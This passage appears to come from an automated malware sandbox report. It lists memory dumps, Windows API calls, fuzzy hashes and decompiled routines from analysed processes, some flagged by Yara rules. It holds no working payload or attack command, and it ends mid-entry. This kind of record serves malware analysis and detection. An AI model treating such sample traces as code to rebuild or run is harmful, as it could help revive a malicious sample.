                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ClassNamelstrcmp
                                                                                • String ID: ComboBox
                                                                                • API String ID: 3770760073-1152790111
                                                                                • Opcode ID: fec2ed8e2c9bd21b0bc795d1cc55ab0f518fecabd309f259a61aa71286f08952
                                                                                • Instruction ID: 2f54a45aece28879db2e6d61642cbce0fa6f618f568b613808186d7d2e2f4277
                                                                                • Opcode Fuzzy Hash: fec2ed8e2c9bd21b0bc795d1cc55ab0f518fecabd309f259a61aa71286f08952
                                                                                • Instruction Fuzzy Hash: 26E0DF70B112015BEB10AF289C09B2A72A4F780302FC44D5CF008C11A0FB7DD694820A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 004318A7
                                                                                • LeaveCriticalSection.KERNEL32(?,?), ref: 004318B7
                                                                                • LocalFree.KERNEL32(?), ref: 004318C0
                                                                                • TlsSetValue.KERNEL32(?,00000000), ref: 004318D6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
• Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
• Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
• Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                • String ID:
                                                                                • API String ID: 2949335588-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0044DD68,?,00000000,?,?,004319F2,00000010,?,00000000,?,?,?,004311BD,0043120A,00430872,004311C3), ref: 00431E35
                                                                                • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,004319F2,00000010,?,00000000,?,?,?,004311BD,0043120A,00430872,004311C3), ref: 00431E47
                                                                                • LeaveCriticalSection.KERNEL32(0044DD68,?,00000000,?,?,004319F2,00000010,?,00000000,?,?,?,004311BD,0043120A,00430872,004311C3), ref: 00431E50
                                                                                • EnterCriticalSection.KERNEL32(00000000,00000000,?,?,004319F2,00000010,?,00000000,?,?,?,004311BD,0043120A,00430872,004311C3,0042E17A), ref: 00431E62
                                                                                  • Part of subcall function 00431D67: GetVersion.KERNEL32(?,00431E0A,?,004319F2,00000010,?,00000000,?,?,?,004311BD,0043120A,00430872,004311C3,0042E17A,0042F3B4), ref: 00431D7A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CriticalSection$Enter$InitializeLeaveVersion
                                                                                • String ID:
                                                                                • API String ID: 1193629340-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • InitializeCriticalSection.KERNEL32(?,00424012,?,00422CBF), ref: 00424D45
                                                                                • InitializeCriticalSection.KERNEL32(?,00424012,?,00422CBF), ref: 00424D4D
                                                                                • InitializeCriticalSection.KERNEL32(?,00424012,?,00422CBF), ref: 00424D55
                                                                                • InitializeCriticalSection.KERNEL32(?,00424012,?,00422CBF), ref: 00424D5D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CriticalInitializeSection
                                                                                • String ID:
                                                                                • API String ID: 32694325-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Executed Functions

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.329095869.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 4cc1a055ef5ad7ffbb4182ab6a3324b9cdb2ae385965ac26bc009718ca027027
                                                                                • Instruction ID: f455264d3e230fdaa5da93997a6747d008b443e26f4d11623bc6616487098b57
                                                                                • Opcode Fuzzy Hash: 4cc1a055ef5ad7ffbb4182ab6a3324b9cdb2ae385965ac26bc009718ca027027
                                                                                • Instruction Fuzzy Hash: 2890026921300003D2917169540860A0005E7D1343F91D425A4005558CC96588ADA361
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.329095869.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 97061f5890ea04ace6c2b4ecc42d50a00c9cc56b1110d23329624cd140ae34d0
                                                                                • Instruction ID: 5648b87f03e205912434b748b2a8678bc994c3f78523e6e99c13484dcec24f85
                                                                                • Opcode Fuzzy Hash: 97061f5890ea04ace6c2b4ecc42d50a00c9cc56b1110d23329624cd140ae34d0
                                                                                • Instruction Fuzzy Hash: A190027131114403D221616984047060005E7D1342F51C421A4814558D86E588D5B162
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.329095869.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 9ee7eadea693d9cebcf30fbf16ecfb24366f1ee7395257516ad07c91ad2ecad4
                                                                                • Instruction ID: ce6b1a714e862e6b33b3a65d62e18ad929d5c69ff1b880c89aa1bdfe96938745
                                                                                • Opcode Fuzzy Hash: 9ee7eadea693d9cebcf30fbf16ecfb24366f1ee7395257516ad07c91ad2ecad4
                                                                                • Instruction Fuzzy Hash: 0F90027120100403D21165A954086460005E7E0342F51D021A9014555EC6B588D5B171
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.329095869.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 641cc91c87e20a9ccc0cefa3d879ddb8fc96f819e66783b39896d707d130bf44
                                                                                • Instruction ID: 3611c612406d18cddccccd86054bbce9a335fcd3a835415094ae52f60009255c
                                                                                • Opcode Fuzzy Hash: 641cc91c87e20a9ccc0cefa3d879ddb8fc96f819e66783b39896d707d130bf44
                                                                                • Instruction Fuzzy Hash: 40B09B719424C5C6D711D77046087177900B7D0741F17C065D1020641A4778C4D5F5B6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                C-Code - Quality: 66%
                                                                                			E00A36A60(intOrPtr* _a4) {
                                                                                				signed int _v8;
                                                                                				char _v24;
                                                                                				signed char _v25;
                                                                                				intOrPtr* _v32;
                                                                                				signed char _v36;
                                                                                				signed int _v40;
                                                                                				intOrPtr* _v44;
                                                                                				char _v48;
                                                                                				intOrPtr _v52;
                                                                                				char _v56;
                                                                                				intOrPtr _v60;
                                                                                				intOrPtr _v64;
                                                                                				intOrPtr* _v68;
                                                                                				signed char _v72;
                                                                                				signed char _v76;
                                                                                				intOrPtr _v80;
                                                                                				intOrPtr _v84;
                                                                                				signed char _v88;
                                                                                				signed int _v92;
                                                                                				signed char _v96;
                                                                                				char _v100;
                                                                                				signed int _v104;
                                                                                				void* _v116;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				intOrPtr* _t101;
                                                                                				void* _t105;
                                                                                				signed int _t112;
                                                                                				signed int* _t113;
                                                                                				signed int* _t114;
                                                                                				intOrPtr _t117;
                                                                                				intOrPtr _t118;
                                                                                				void* _t122;
                                                                                				signed int _t127;
                                                                                				intOrPtr* _t128;
                                                                                				signed int _t131;
                                                                                				signed char _t134;
                                                                                				signed int _t136;
                                                                                				intOrPtr* _t138;
                                                                                				intOrPtr* _t139;
                                                                                				intOrPtr _t143;
                                                                                				signed char _t144;
                                                                                				signed short _t145;
                                                                                				signed char _t146;
                                                                                				intOrPtr* _t147;
                                                                                				intOrPtr _t148;
                                                                                				void* _t150;
                                                                                				char _t152;
                                                                                				signed int _t153;
                                                                                				signed char _t154;
                                                                                
                                                                                				_v8 =  *0xafd360 ^ _t153;
                                                                                				_t144 =  *0x7ffe03c6;
                                                                                				_v25 = _t144;
                                                                                				_t128 = _a4;
                                                                                				_v44 = _t128;
                                                                                				if((_t144 & 0x00000001) == 0) {
                                                                                					L54:
                                                                                					_push(0);
                                                                                					_push( &_v100);
                                                                                					E00A49810();
                                                                                					 *_t128 = _v100;
                                                                                					 *(_t128 + 4) = _v96;
                                                                                					goto L20;
                                                                                				} else {
                                                                                					do {
                                                                                						_t148 =  *0x7ffe03b8;
                                                                                						_t134 =  *0x7FFE03BC;
                                                                                						_t146 =  *0x7FFE03BC;
                                                                                						_v60 = _t148;
                                                                                						_v76 = _t134;
                                                                                					} while (_t148 !=  *0x7ffe03b8 || _t134 != _t146);
                                                                                					_t128 = _v44;
                                                                                					if((_t144 & 0x00000002) != 0) {
                                                                                						_t147 =  *0xaf6908; // 0x0
                                                                                						_v68 = _t147;
                                                                                						if(_t147 == 0) {
                                                                                							goto L54;
                                                                                						} else {
                                                                                							goto L22;
                                                                                						}
                                                                                						while(1) {
                                                                                							L22:
                                                                                							_t101 =  *_t147;
                                                                                							_v32 = _t101;
                                                                                							if(_t101 == 0) {
                                                                                								break;
                                                                                							}
                                                                                							if(_t144 >= 0) {
                                                                                								if((_t144 & 0x00000020) == 0) {
                                                                                									if((_t144 & 0x00000010) != 0) {
                                                                                										asm("mfence");
                                                                                									}
                                                                                								} else {
                                                                                									asm("lfence");
                                                                                								}
                                                                                								asm("rdtsc");
                                                                                							} else {
                                                                                								asm("rdtscp");
                                                                                								_v72 = _t134;
                                                                                							}
                                                                                							_v52 = _t101;
                                                                                							_v84 =  *((intOrPtr*)(_t147 + 8));
                                                                                							_v64 =  *((intOrPtr*)(_t147 + 0x10));
                                                                                							_v80 =  *((intOrPtr*)(_t147 + 0x14));
                                                                                							_t105 = E00A4CF90(_t144, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
                                                                                							_t146 = _t144;
                                                                                							E00A4CF90(_v52, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
                                                                                							_t150 = _t105 + _t144;
                                                                                							_t144 = _v25;
                                                                                							asm("adc edi, 0x0");
                                                                                							_v40 = _t150 + _v64;
                                                                                							_t147 = _v68;
                                                                                							asm("adc edi, [ebp-0x4c]");
                                                                                							_v36 = _t146;
                                                                                							if( *_t147 != _v32) {
                                                                                								continue;
                                                                                							} else {
                                                                                								_t128 = _v44;
                                                                                								_t147 = _v60;
                                                                                								L19:
                                                                                								_t144 = _v36;
                                                                                								asm("adc edx, [ebp-0x48]");
                                                                                								 *_t128 = E00A4D340(_v40 + _t147,  *0x7ffe03c7 & 0x000000ff, _t144);
                                                                                								 *(_t128 + 4) = _t144;
                                                                                								L20:
                                                                                								return E00A4B640(1, _t128, _v8 ^ _t153, _t144, _t146, _t147);
                                                                                							}
                                                                                						}
                                                                                						_t128 = _v44;
                                                                                						goto L54;
                                                                                					}
                                                                                					_v56 = 0xffffffff;
                                                                                					if( *((intOrPtr*)( *[fs:0x18] + 0xfdc)) == 0) {
                                                                                						_t136 = 0x14c;
                                                                                						L14:
                                                                                						_t112 = _t136 & 0x0000ffff;
                                                                                						L15:
                                                                                						if(_t112 == 0xaa64) {
                                                                                							_t113 =  &_v40;
                                                                                							_v32 = _t113;
                                                                                							_t138 = _v32;
                                                                                							asm("int 0x81");
                                                                                							 *_t138 = _t113;
                                                                                							 *(_t138 + 4) = _t144;
                                                                                							if((_t144 & 0x00000040) == 0) {
                                                                                								goto L19;
                                                                                							}
                                                                                							_t114 =  &_v92;
                                                                                							_v32 = _t114;
                                                                                							_t139 = _v32;
                                                                                							asm("int 0x81");
                                                                                							 *_t139 = _t114;
                                                                                							 *(_t139 + 4) = _t144;
                                                                                							_t144 = _v88;
                                                                                							if(((_t144 ^ _v36) & 0x00000001) != 0) {
                                                                                								goto L19;
                                                                                							}
                                                                                							_t112 = _v92;
                                                                                							L18:
                                                                                							_v40 = _t112;
                                                                                							_v36 = _t144;
                                                                                							goto L19;
                                                                                						}
                                                                                						if(_t144 >= 0) {
                                                                                							if((_t144 & 0x00000020) == 0) {
                                                                                								if((_t144 & 0x00000010) != 0) {
                                                                                									asm("mfence");
                                                                                								}
                                                                                							} else {
                                                                                								asm("lfence");
                                                                                							}
                                                                                							asm("rdtsc");
                                                                                						} else {
                                                                                							asm("rdtscp");
                                                                                						}
                                                                                						goto L18;
                                                                                					}
                                                                                					_t117 =  *[fs:0x18];
                                                                                					_t143 =  *((intOrPtr*)(_t117 + 0xfdc));
                                                                                					if(_t143 < 0) {
                                                                                						_t117 = _t117 + _t143;
                                                                                					}
                                                                                					if(_t117 ==  *((intOrPtr*)(_t117 + 0x18))) {
                                                                                						_t118 =  *((intOrPtr*)(_t117 + 0xe38));
                                                                                					} else {
                                                                                						_t118 =  *((intOrPtr*)(_t117 + 0x14d0));
                                                                                					}
                                                                                					if(_t118 == 0 ||  *((short*)(_t118 + 0x22)) == 0) {
                                                                                						L34:
                                                                                						_v48 = 0x10;
                                                                                						_push( &_v48);
                                                                                						_push(0x10);
                                                                                						_t146 =  &_v24;
                                                                                						_push(_t146);
                                                                                						_push(4);
                                                                                						_push( &_v56);
                                                                                						_push(0xb5);
                                                                                						_t122 = E00A4AA90();
                                                                                						if(_t122 == 0xc0000023) {
                                                                                							_t152 = _v48;
                                                                                							E00A4D000(_t152);
                                                                                							_t146 = _t154;
                                                                                							_push( &_v48);
                                                                                							_push(_t152);
                                                                                							_push(_t146);
                                                                                							_push(4);
                                                                                							_push( &_v56);
                                                                                							_push(0xb5);
                                                                                							_t122 = E00A4AA90();
                                                                                							_t147 = _v60;
                                                                                						}
                                                                                						if(_t122 < 0) {
                                                                                							_t112 = _v104;
                                                                                							_t144 = _v25;
                                                                                							goto L15;
                                                                                						} else {
                                                                                							_t145 =  *_t146;
                                                                                							_t136 = 0;
                                                                                							if(_t145 == 0) {
                                                                                								L43:
                                                                                								_t144 = _v25;
                                                                                								goto L14;
                                                                                							}
                                                                                							_t131 = 0;
                                                                                							do {
                                                                                								if((_t145 & 0x00040000) != 0) {
                                                                                									_t136 = _t145 & 0x0000ffff;
                                                                                								}
                                                                                								_t145 =  *(_t146 + 4 + _t131 * 4);
                                                                                								_t131 = _t131 + 1;
                                                                                							} while (_t145 != 0);
                                                                                							_t128 = _v44;
                                                                                							goto L43;
                                                                                						}
                                                                                					} else {
                                                                                						_t127 =  *(_t118 + 0x20) & 0x0000ffff;
                                                                                						if(_t127 == 0) {
                                                                                							goto L34;
                                                                                						}
                                                                                						_t136 = _t127;
                                                                                						goto L14;
                                                                                					}
                                                                                				}
                                                                                			}

                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.329095869.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 86f70524154c4e0574ed6cae41c63e578bcfcf9be931135ecc3def053d98e4b7
                                                                                • Instruction ID: 29730a296b8c86ab95f0ccf352e068bcd99d0e91b6d5d005297e5478c5c4a243
                                                                                • Opcode Fuzzy Hash: 86f70524154c4e0574ed6cae41c63e578bcfcf9be931135ecc3def053d98e4b7
                                                                                • Instruction Fuzzy Hash: 75815775E002199FDB24CF98C981BEEBBB5EF48340F14C069E949AB281D775AD05CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 53%
                                                                                			E00A9FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                				void* _t7;
                                                                                				intOrPtr _t9;
                                                                                				intOrPtr _t10;
                                                                                				intOrPtr* _t12;
                                                                                				intOrPtr* _t13;
                                                                                				intOrPtr _t14;
                                                                                				intOrPtr* _t15;
                                                                                
                                                                                				_t13 = __edx;
                                                                                				_push(_a4);
                                                                                				_t14 =  *[fs:0x18];
                                                                                				_t15 = _t12;
                                                                                				_t7 = E00A4CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                				_push(_t13);
                                                                                				E00A95720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                				_t9 =  *_t15;
                                                                                				if(_t9 == 0xffffffff) {
                                                                                					_t10 = 0;
                                                                                				} else {
                                                                                					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                				}
                                                                                				_push(_t10);
                                                                                				_push(_t15);
                                                                                				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                				return E00A95720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                			}

                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A9FDFA
                                                                                Strings
                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A9FE01
                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A9FE2B
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.329095869.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                • API String ID: 885266447-3903918235
                                                                                • Opcode ID: 56d8e72654405563a8ffb95d3bd84b11b48ee170e74613cfb83fd8ec3996c458
                                                                                • Instruction ID: f9777dde4f8a5118051e18914841f152b5170893f61db5a15f5c931e5081b0a8
                                                                                • Opcode Fuzzy Hash: 56d8e72654405563a8ffb95d3bd84b11b48ee170e74613cfb83fd8ec3996c458
                                                                                • Instruction Fuzzy Hash: 46F0C232640601BFDA211A95DD07F23BBAAEB84730F240214F628965E1DA62A92097A0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Executed Functions

                                                                                APIs
                                                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,00503B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00503B87,007A002E,00000000,00000060,00000000,00000000), ref: 005081FD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: .z`$8P
                                                                                • API String ID: 823142352-3636872588
                                                                                • Opcode ID: 835d702d98e6a78139b867d18569f72eeca8db575ab25c8f25acf748b4f9dde2
                                                                                • Instruction ID: 0b2c2310bc899a118bfd8fa30e56ba24b497b8b72d643f5d44aa6173c5e34021
                                                                                • Opcode Fuzzy Hash: 835d702d98e6a78139b867d18569f72eeca8db575ab25c8f25acf748b4f9dde2
                                                                                • Instruction Fuzzy Hash: 7C2113B6200109AFCB08DF98DC84DEB77ADFF8C354B158648FA5D97242CA30E851CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,00503B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00503B87,007A002E,00000000,00000060,00000000,00000000), ref: 005081FD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: .z`
                                                                                • API String ID: 823142352-1441809116
                                                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                • Instruction ID: 7790d7f8349c62104df81fb3393615af9aa555e34a285839bbae5eaa5fec1822
                                                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                • Instruction Fuzzy Hash: EBF0B6B2200108ABCB08CF88DC85DEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtClose.NTDLL( =P,?,?,00503D20,00000000,FFFFFFFF), ref: 00508305
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID: =P
                                                                                • API String ID: 3535843008-3331294904
                                                                                • Opcode ID: 42a4e19755708be5b448a1cf69ad434697d2b993baadc6a237a9eafe4f69f158
                                                                                • Instruction ID: 9c9c7e711c2d26b7380033e6fafa3eb1848a8e2e329535a383972a2f5c1b7efa
                                                                                • Opcode Fuzzy Hash: 42a4e19755708be5b448a1cf69ad434697d2b993baadc6a237a9eafe4f69f158
                                                                                • Instruction Fuzzy Hash: 8AF05EB6200214ABD724EF98DC81EEB7769EF88710F148559BA4C9B241CA30E91587E0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtClose.NTDLL( =P,?,?,00503D20,00000000,FFFFFFFF), ref: 00508305
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID: =P
                                                                                • API String ID: 3535843008-3331294904
                                                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                • Instruction ID: d5cf50fcd03d5d1f027301f261908f048e2b794d9e216f7cbb14617180df8402
                                                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                • Instruction Fuzzy Hash: 30D01276200214ABD710EF98CC45EE77B5CEF44750F154555BA585B282C930F90086E0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtReadFile.NTDLL(?,?,FFFFFFFF,00503A01,?,?,?,?,00503A01,FFFFFFFF,?,B=P,?,00000000), ref: 005082A5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: 678ac9fd61a0bce31e20aba1835998ab4c3516fc940bdc12fbdb0f57bc8d7e21
                                                                                • Instruction ID: f7de7a4844ab0a3121fb79737ff36ccb42fcd22edb6bf179a7a47180a2bc8e55
                                                                                • Opcode Fuzzy Hash: 678ac9fd61a0bce31e20aba1835998ab4c3516fc940bdc12fbdb0f57bc8d7e21
                                                                                • Instruction Fuzzy Hash: 26F0F9B2200104AFCB14CF99DC94DEB7BA9AF8C354F058258BA0D97281D630E811CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,004F2D11,00002000,00003000,00000004), ref: 005083C9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateMemoryVirtual
                                                                                • String ID:
                                                                                • API String ID: 2167126740-0
                                                                                • Opcode ID: b0bf6cf96fcd60f43a3171a5805deff9adaf08db7ad2056f639cc23d8bb77abc
                                                                                • Instruction ID: 86a2428969781c0454508b98b544c264234e789dab82e31383476f8c1f9320f1
                                                                                • Opcode Fuzzy Hash: b0bf6cf96fcd60f43a3171a5805deff9adaf08db7ad2056f639cc23d8bb77abc
                                                                                • Instruction Fuzzy Hash: 92F090B5604248AFDB14CF65DC81DEB7B68BF99304F15424DFD5897282C630E911CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtReadFile.NTDLL(?,?,FFFFFFFF,00503A01,?,?,?,?,00503A01,FFFFFFFF,?,B=P,?,00000000), ref: 005082A5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                • Instruction ID: 46f6c7b8642987fbc04e9af0338a05bd46eb557290719fed6c291393c1a10afb
                                                                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                • Instruction Fuzzy Hash: DAF0A4B2200208ABCB14DF89DC85EEB77ADAF8C754F158248BA1D97241DA30E8118BA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,004F2D11,00002000,00003000,00000004), ref: 005083C9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateMemoryVirtual
                                                                                • String ID:
                                                                                • API String ID: 2167126740-0
                                                                                • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                • Instruction ID: 9d4b9750bb76bf69e10a5f5db9f394f8b132a610a50be668dd1de9caa47c77bf
                                                                                • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                • Instruction Fuzzy Hash: 28F01CB2200208ABCB14DF89CC81EEB77ADAF88750F158148BE0897241C630F810CBE0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 113131efdb780e898d9cf056464af230c421e3ad48ae82c16b3967e7eb801fcc
                                                                                • Instruction ID: 560a2d4491da07e643dfeffe8fbe8feef7d83c42b8a91c34f3db9f823360f8f2
                                                                                • Opcode Fuzzy Hash: 113131efdb780e898d9cf056464af230c421e3ad48ae82c16b3967e7eb801fcc
                                                                                • Instruction Fuzzy Hash: 149004F5751000033505F55D07145070047D7D57D5751C033F1007550CD775DC717171
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.505560596.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: true
                                                                                • Associated: 0000000E.00000002.506097165.000000000457B000.00000040.00000001.sdmp
                                                                                • Associated: 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: e19f37e953721989aeeb1c47c9cf8615977a00899c9e78a2ab8e297a5b45b7b5
                                                                                • Instruction ID: 7e7ed3dfb823baa39dbd0e20010e474eced7017274240bda4aba8c724a3527a0
